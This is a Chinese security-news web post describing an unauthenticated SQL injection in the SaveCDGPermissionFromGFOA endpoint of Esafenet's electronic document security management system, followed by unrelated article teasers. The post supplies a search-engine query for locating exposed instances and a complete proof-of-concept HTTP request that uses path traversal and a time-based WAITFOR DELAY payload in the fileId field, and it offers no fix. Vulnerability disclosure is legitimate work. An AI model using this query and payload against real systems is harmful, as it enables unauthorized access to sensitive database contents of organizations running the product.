SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日

微信小程序服务器租用费用是多少？

你有没有想过，微信小程序背后的服务器租用费用是多少？作为目前最火热的移动应用，微信小程序已经成为各行业必不可少的营销工具。但是，随着用户量的增加，微信小程序的服务器租用费用也成为了…

牛晓晓
行业资讯 2024年4月11日
00
怎么查看服务器访问ip，服务器如何查看哪些ip访问过

1. 对于网站管理员和用户来说，了解哪些服务器IP被屏蔽以及被屏蔽的原因非常重要。 2.您可以使用ping命令、在线工具、VPN等检查您的服务器IP是否被封锁。 3、如果您发现您的…

牛晓晓
行业资讯 2024年5月7日
00
北京网站建设制作公司，北京网站建设排名

在当今的数字时代，网站建设和设计行业正在迅速发展，越来越多的公司开始建立自己的网站。随着市场需求的增加，北京网站建设公司应运而生，为企业提供专业的网站建设服务。那么，网站建设与设计…

牛晓晓
行业资讯 2024年3月26日
00
如何使用melogin.cn进行网络互联？

网络互联是当今社会发展的必然趋势，它将不同的网络连接起来，为我们提供更加便捷的信息交流和资源共享。而melogin.cn作为一款专业的网络互联软件，为我们提供了更加高效和安全的网络…

牛晓晓
行业资讯 2024年4月8日
00

发表回复